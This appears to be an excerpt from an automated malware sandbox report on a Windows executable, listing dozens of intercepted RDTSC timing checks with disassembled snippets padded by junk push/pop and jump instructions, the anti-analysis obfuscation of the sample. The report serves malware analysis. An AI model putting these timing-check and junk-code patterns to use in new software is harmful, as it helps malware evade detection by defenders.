Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9999 second address: 2E9A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9558C38A06h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F9558C389F8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D196Eh], edx 0x0000002e mov edi, 61AAC19Bh 0x00000033 push 00000000h 0x00000035 jp 00007F9558C389FCh 0x0000003b mov esi, dword ptr [ebp+122D3741h] 0x00000041 push 00000000h 0x00000043 mov edi, 6BA3B368h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9A02 second address: 2E9A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9A1A second address: 2E9A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9A20 second address: 2E9A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC012 second address: 2EC01C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EBCD9 second address: 2EBCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29E0D8 second address: 29E0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29E0DC second address: 29E0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29E0E2 second address: 29E0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EEA6C second address: 2EEA71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EEA71 second address: 2EEA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C38A00h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EEA8F second address: 2EEA95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EEA95 second address: 2EEAFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F9558C389F8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+1244C8E4h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F9558C389F8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EEAFE second address: 2EEB04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EF55E second address: 2EF562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F2B5E second address: 2F2B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F6EAD second address: 2F6EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F6EB1 second address: 2F6EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F95588494A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7ED4 second address: 2F7F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C38A01h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F9558C38A05h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7F02 second address: 2F7F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F95588494A8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 jmp 00007F95588494ACh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F95588494A8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D1F1Ch], ebx 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b mov di, B955h 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jnl 00007F95588494BBh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F6017 second address: 2F603D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F9558C38A05h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F603D second address: 2F6042 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F4EA6 second address: 2F4ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9558C389F6h 0x0000000a popad 0x0000000b jmp 00007F9558C389FEh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9558C389FAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F70C5 second address: 2F70DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F70DB second address: 2F70FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jo 00007F9558C389F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FB15D second address: 2FB167 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95588494A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FA1FA second address: 2FA200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FA200 second address: 2FA214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F95588494B4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC18B second address: 2FC191 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC191 second address: 2FC197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC197 second address: 2FC19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FD268 second address: 2FD27C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FE092 second address: 2FE096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FE096 second address: 2FE115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F95588494ACh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F95588494ACh 0x00000015 sbb bl, FFFFFFFAh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F95588494A8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push esi 0x00000035 sub di, EE36h 0x0000003a pop edi 0x0000003b jmp 00007F95588494AFh 0x00000040 push 00000000h 0x00000042 sub dword ptr [ebp+12452AE8h], edx 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push edi 0x0000004c pop edi 0x0000004d ja 00007F95588494A6h 0x00000053 popad 0x00000054 pushad 0x00000055 jo 00007F95588494A6h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FF0D1 second address: 2FF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FF0D5 second address: 2FF134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F95588494A8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov ebx, 02D1A5ECh 0x00000027 push 00000000h 0x00000029 add dword ptr [ebp+1244BF5Eh], ecx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F95588494A8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b sbb edi, 5EBA5FFFh 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC37F second address: 2FC383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC383 second address: 2FC429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F95588494B8h 0x0000000c popad 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1F65h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b add dword ptr [ebp+1244A1DAh], esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F95588494A8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov dword ptr [ebp+1244C8F4h], edx 0x00000048 mov eax, dword ptr [ebp+122D0FE5h] 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F95588494A8h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 add dword ptr [ebp+122D3B93h], eax 0x0000006e mov ebx, dword ptr [ebp+122D1A3Eh] 0x00000074 push FFFFFFFFh 0x00000076 jmp 00007F95588494ADh 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e push esi 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FC429 second address: 2FC42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FB28D second address: 2FB293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FE23C second address: 2FE2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C389FBh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F9558C389F8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e adc ebx, 2107BE16h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov edi, dword ptr [ebp+12445B14h] 0x00000041 mov eax, dword ptr [ebp+122D0A69h] 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007F9558C389F8h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 0000001Bh 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 mov bx, si 0x00000064 cmc 0x00000065 push FFFFFFFFh 0x00000067 sub dword ptr [ebp+122D3B46h], edi 0x0000006d nop 0x0000006e pushad 0x0000006f push edx 0x00000070 pushad 0x00000071 popad 0x00000072 pop edx 0x00000073 push eax 0x00000074 push edx 0x00000075 jng 00007F9558C389F6h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FE2C9 second address: 2FE2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3000D6 second address: 3000E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30038E second address: 300394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 300394 second address: 30039A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30039A second address: 3003BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F95588494ACh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3003BC second address: 3003C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CB8 second address: 304CC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CC8 second address: 304CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C38A06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CE2 second address: 304D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F95588494ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F95588494B1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304D04 second address: 304D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304D0A second address: 304D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4BD8 second address: 2A4BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9558C389F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30AB63 second address: 30AB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F95588494A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30AB72 second address: 30AB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DA4D second address: 30DA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DA51 second address: 30DA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jns 00007F9558C389F6h 0x0000000d jmp 00007F9558C389FFh 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DA6E second address: 30DA9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007F95588494A6h 0x0000000b jno 00007F95588494A6h 0x00000011 jmp 00007F95588494B2h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F95588494A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DA9A second address: 30DADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FFh 0x00000007 jmp 00007F9558C38A06h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jnl 00007F9558C38A02h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DADC second address: 30DAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DC31 second address: 30DC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F9558C38A09h 0x0000000a jmp 00007F9558C38A09h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9558C38A07h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DDF3 second address: 30DE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95588494B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFAA second address: 30DFAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFAF second address: 30DFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F95588494A8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F95588494C9h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313D5A second address: 313D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313D64 second address: 313D90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F95588494BBh 0x0000000e jmp 00007F95588494B5h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313D90 second address: 313D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313D94 second address: 313DA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007F95588494B4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313DA6 second address: 313DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313F3D second address: 313F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95588494AEh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F95588494B7h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F95588494B4h 0x0000001b mov eax, dword ptr [eax] 0x0000001d js 00007F95588494C5h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F95588494B3h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 313F9F second address: 313FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319CC9 second address: 319CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 jmp 00007F95588494B1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319CE1 second address: 319CF8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9558C389FCh 0x00000008 push eax 0x00000009 jnl 00007F9558C389F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319CF8 second address: 319D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F95588494A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319E45 second address: 319E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F9558C389F8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319E52 second address: 319E79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F95588494B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A2BB second address: 31A2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A696 second address: 31A69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
